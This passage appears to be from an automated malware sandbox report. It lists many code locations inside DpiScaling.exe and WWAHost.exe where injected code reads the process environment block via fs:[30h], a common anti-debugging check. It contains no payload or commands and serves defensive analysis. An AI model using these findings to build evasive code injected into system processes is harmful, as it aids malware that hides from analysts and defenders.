          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04954120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04954120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04954120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04962ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04962AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04935210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04953A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04948A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04974A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04974A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0497927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04962397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04941B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04941B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04964BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04964BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04964BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04963B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04963B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A08B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03748B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03745BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03681B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03681B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0372D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0372B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0372B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03748A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03704257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03688A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03693A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03675210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03675210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03675210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03675210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03694120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03679100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03679100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03679100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_037041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03732073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03741074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03690050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03690050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03744015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03744015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0370B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0370B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0370B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0370B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0370B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0370B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03679080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03748F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03674F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03674F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0370FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0370FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0374070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0374070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03688794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0372FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03731608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03748ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0372FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03740EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03740EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03740EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0370FE87 mov eax, dword ptr fs:[00000030h]
